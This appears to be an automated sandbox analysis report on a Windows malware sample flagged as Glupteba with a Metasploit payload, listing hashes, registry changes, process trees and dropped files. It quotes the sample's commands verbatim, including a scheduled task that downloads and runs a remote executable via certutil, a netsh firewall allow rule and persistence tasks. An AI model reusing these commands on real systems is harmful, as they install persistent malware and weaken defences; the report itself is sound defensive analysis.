Analysis
-
max time kernel
152s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
14-07-2022 00:54
Static task
static1
Behavioral task
behavioral1
Sample
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe
Resource
win10v2004-20220414-en
General
-
Target
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe
-
Size
3.8MB
-
MD5
7211b52a2128346943f4630764c26301
-
SHA1
3d5abd24418cc11ae96c4b3be8c36008856fb4ad
-
SHA256
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9
-
SHA512
d8bdc1a4ed5efeb13b6c2c22502436869abf3f296785a3b77304db1e6514fec249b5759ab0389485d70a64750a41fd0391e30dbe6955d9dac77182b4aef36222
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/1476-131-0x0000000003B60000-0x0000000004362000-memory.dmp family_glupteba behavioral2/memory/1476-133-0x0000000000400000-0x000000000334E000-memory.dmp family_glupteba behavioral2/memory/1476-134-0x0000000000400000-0x000000000334E000-memory.dmp family_glupteba behavioral2/memory/4548-138-0x0000000000400000-0x000000000334E000-memory.dmp family_glupteba behavioral2/memory/4548-142-0x0000000000400000-0x000000000334E000-memory.dmp family_glupteba behavioral2/memory/4172-146-0x0000000000400000-0x000000000334E000-memory.dmp family_glupteba behavioral2/memory/4172-151-0x0000000000400000-0x000000000334E000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 4144 created 1476 4144 svchost.exe 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe PID 4144 created 4172 4144 svchost.exe csrss.exe PID 4144 created 4172 4144 svchost.exe csrss.exe PID 4144 created 4172 4144 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 4172 csrss.exe 2452 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YoungVoice = "\"C:\\Windows\\rss\\csrss.exe\"" 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 2596 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exedescription ioc process File created C:\Windows\rss\csrss.exe 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe File opened for modification C:\Windows\rss 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3540 1476 WerFault.exe 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe 2996 4548 WerFault.exe 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3156 schtasks.exe 3152 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" csrss.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.execsrss.exepid process 1476 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe 1476 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe 4548 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe 4548 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe 4172 csrss.exe 4172 csrss.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 1476 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe Token: SeImpersonatePrivilege 1476 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe Token: SeTcbPrivilege 4144 svchost.exe Token: SeTcbPrivilege 4144 svchost.exe Token: SeBackupPrivilege 4144 svchost.exe Token: SeRestorePrivilege 4144 svchost.exe Token: SeBackupPrivilege 4144 svchost.exe Token: SeRestorePrivilege 4144 svchost.exe Token: SeBackupPrivilege 4144 svchost.exe Token: SeRestorePrivilege 4144 svchost.exe Token: SeBackupPrivilege 4144 svchost.exe Token: SeRestorePrivilege 4144 svchost.exe Token: SeSystemEnvironmentPrivilege 4172 csrss.exe Token: SeBackupPrivilege 4144 svchost.exe Token: SeRestorePrivilege 4144 svchost.exe Token: SeBackupPrivilege 4144 svchost.exe Token: SeRestorePrivilege 4144 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exe49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.execmd.execsrss.exedescription pid process target process PID 4144 wrote to memory of 4548 4144 svchost.exe 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe PID 4144 wrote to memory of 4548 4144 svchost.exe 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe PID 4144 wrote to memory of 4548 4144 svchost.exe 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe PID 4548 wrote to memory of 4780 4548 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe cmd.exe PID 4548 wrote to memory of 4780 4548 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe cmd.exe PID 4780 wrote to memory of 656 4780 cmd.exe netsh.exe PID 4780 wrote to memory of 656 4780 cmd.exe netsh.exe PID 4548 wrote to memory of 4172 4548 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe csrss.exe PID 4548 wrote to memory of 4172 4548 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe csrss.exe PID 4548 wrote to memory of 4172 4548 49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe csrss.exe PID 4144 wrote to memory of 3156 4144 svchost.exe schtasks.exe PID 4144 wrote to memory of 3156 4144 svchost.exe schtasks.exe PID 4144 wrote to memory of 3152 4144 svchost.exe schtasks.exe PID 4144 wrote to memory of 3152 4144 svchost.exe schtasks.exe PID 4144 wrote to memory of 2452 4144 svchost.exe patch.exe PID 4144 wrote to memory of 2452 4144 svchost.exe patch.exe PID 4172 wrote to memory of 2596 4172 csrss.exe bcdedit.exe PID 4172 wrote to memory of 2596 4172 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe"C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe"C:\Users\Admin\AppData\Local\Temp\49174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 8723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 9162⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1476 -ip 14761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4548 -ip 45481⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Windows\rss\csrss.exeFilesize
3.8MB
MD57211b52a2128346943f4630764c26301
SHA13d5abd24418cc11ae96c4b3be8c36008856fb4ad
SHA25649174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9
SHA512d8bdc1a4ed5efeb13b6c2c22502436869abf3f296785a3b77304db1e6514fec249b5759ab0389485d70a64750a41fd0391e30dbe6955d9dac77182b4aef36222
-
C:\Windows\rss\csrss.exeFilesize
3.8MB
MD57211b52a2128346943f4630764c26301
SHA13d5abd24418cc11ae96c4b3be8c36008856fb4ad
SHA25649174c09f2a55a85d980063228c0afe28a28c3011e0dc29087141156c31be3c9
SHA512d8bdc1a4ed5efeb13b6c2c22502436869abf3f296785a3b77304db1e6514fec249b5759ab0389485d70a64750a41fd0391e30dbe6955d9dac77182b4aef36222
-
memory/656-137-0x0000000000000000-mapping.dmp
-
memory/1476-131-0x0000000003B60000-0x0000000004362000-memory.dmpFilesize
8.0MB
-
memory/1476-133-0x0000000000400000-0x000000000334E000-memory.dmpFilesize
47.3MB
-
memory/1476-134-0x0000000000400000-0x000000000334E000-memory.dmpFilesize
47.3MB
-
memory/1476-130-0x00000000037AF000-0x0000000003B56000-memory.dmpFilesize
3.7MB
-
memory/2452-147-0x0000000000000000-mapping.dmp
-
memory/2596-149-0x0000000000000000-mapping.dmp
-
memory/3152-145-0x0000000000000000-mapping.dmp
-
memory/3156-144-0x0000000000000000-mapping.dmp
-
memory/4172-139-0x0000000000000000-mapping.dmp
-
memory/4172-143-0x0000000003C00000-0x0000000003FA7000-memory.dmpFilesize
3.7MB
-
memory/4172-146-0x0000000000400000-0x000000000334E000-memory.dmpFilesize
47.3MB
-
memory/4172-150-0x0000000003C00000-0x0000000003FA7000-memory.dmpFilesize
3.7MB
-
memory/4172-151-0x0000000000400000-0x000000000334E000-memory.dmpFilesize
47.3MB
-
memory/4548-142-0x0000000000400000-0x000000000334E000-memory.dmpFilesize
47.3MB
-
memory/4548-138-0x0000000000400000-0x000000000334E000-memory.dmpFilesize
47.3MB
-
memory/4548-135-0x0000000003825000-0x0000000003BCC000-memory.dmpFilesize
3.7MB
-
memory/4548-132-0x0000000000000000-mapping.dmp
-
memory/4780-136-0x0000000000000000-mapping.dmp